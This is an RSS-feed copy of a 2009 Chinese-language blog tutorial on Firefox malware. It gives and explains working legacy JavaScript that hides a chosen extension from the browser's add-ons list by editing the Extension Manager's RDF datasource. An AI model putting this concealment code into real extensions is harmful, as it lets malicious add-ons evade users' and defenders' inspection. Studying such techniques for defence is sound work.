onHacks » Firefox http://onhacks.org On Hacking Across Boundaries Wed, 02 Jun 2010 05:48:30 +0000 zh-hk hourly 1 http://wordpress.org/?v=3.0.1 Firefox 惡意程式教學 – 壹 http://onhacks.org/lang/zh-hk/2009/02/11/firefox-malware-tutorial-1 http://onhacks.org/lang/zh-hk/2009/02/11/firefox-malware-tutorial-1#comments Wed, 11 Feb 2009 14:13:43 +0000 log0 http://onhacks.org/?p=214 火狐瀏覽器是 Internet Explorer 的最大敵人,有非常好的市場佔有率,並持續增長。若你可以安裝惡意代碼,並且廣為流傳,將會為犯罪機構帶來大量收益。要保護我們的第一步,當然是要明白背後的原理,我會寫一個不能被在插件頁面看到的插件。

火狐插件資料是存放在 extensions.rdf 裡。RDF 只是某特定 XML 。插件頁面會調用 Extension Manager ,而 Extension Manager 是實現 nsIExtensionManager 的。nsIExtensionManager 中的 datasource 就是存放讀了在內存的 extensions.rdf ,並且是可寫的。只要改動這個 Extension Manager 指向的 datasource 就可以把想要隱藏的插件從列表移除。

代碼:


function ext_mgr_hide_extension(tgt_ext_name)
{
    var rdfContainer = Components.classes["@mozilla.org/rdf/container;1"].
        createInstance(Components.interfaces.nsIRDFContainer);
    var extensionDataSource =
        Components.classes["@mozilla.org/extensions/manager;1"].
        getService(Components.interfaces.nsIExtensionManager).datasource;
    var rdfService = Components.classes["@mozilla.org/rdf/rdf-service;1"].
        getService(Components.interfaces.nsIRDFService);
    var root = rdfService.GetResource("urn:mozilla:item:root"); 

    try
    {
        rdfContainer.Init(extensionDataSource, root);

        var exts = rdfContainer.GetElements();
        while ( exts.hasMoreElements() )
        {
            var ext = exts.getNext();
            var ext_name = extensionDataSource.GetTarget(
                ext, rdfService.GetResource(
                    "http://www.mozilla.org/2004/em-rdf#name"), true).
                QueryInterface(Components.interfaces.nsIRDFLiteral).Value;
            if ( ext_name == tgt_ext_name )
                rdfContainer.RemoveElement(ext, true);
        }
    }
    catch (e)
    {
        alert(e);
    }
}

實現 nsIRDFContainer, 用來控制 RDF 檔的 RDF Container :

var rdfContainer = Components.classes["@mozilla.org/rdf/container;1"].
        createInstance(Components.interfaces.nsIRDFContainer);

拿 Extension Manager 的 datasource 就好了 : 

var extensionDataSource =
        Components.classes["@mozilla.org/extensions/manager;1"].
        getService(Components.interfaces.nsIExtensionManager).datasource;

要拿到可用數據,還是要用 RDF Service, 實現單例 nsIRDFService :

var rdfService = Components.classes["@mozilla.org/rdf/rdf-service;1"].
        getService(Components.interfaces.nsIRDFService);

搵最開始的 :

var root = rdfService.GetResource("urn:mozilla:item:root");

始動 RDF Container :

rdfContainer.Init(extensionDataSource, root);

把插件名字拿出來, 是存放在 RDF Literal 裡的 :

var ext_name = extensionDataSource.GetTarget(ext,
    rdfService.GetResource(
        "http://www.mozilla.org/2004/em-rdf#name"), true
    ).QueryInterface(Components.interfaces.nsIRDFLiteral).Value;

是我們要用的就移除!

if ( ext_name == tgt_ext_name )
     rdfContainer.RemoveElement(ext, true);

淨返既就睇你諗頭…

額外

正常的顯示插件做法:

function ext_mgr_dump()
{
	var extensionManager = Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager);

	var count = new Object();
	var items = new Object();
	var extensions = extensionManager.getItemList(2, count, items); // 2 is the value for EXTENSIONS
	count = count.value;

	var extension;
	var s_exts = "";
	for (var i = 0; i < count; ++i)
    {
		extension = extensions[i];
		s_exts += "*** " + extension.name + " " + extension.version + "\n";
	}

    return s_exts;
}

Reference :

Firefox Extension Development

]]> http://onhacks.org/lang/zh-hk/2009/02/11/firefox-malware-tutorial-1/feed 0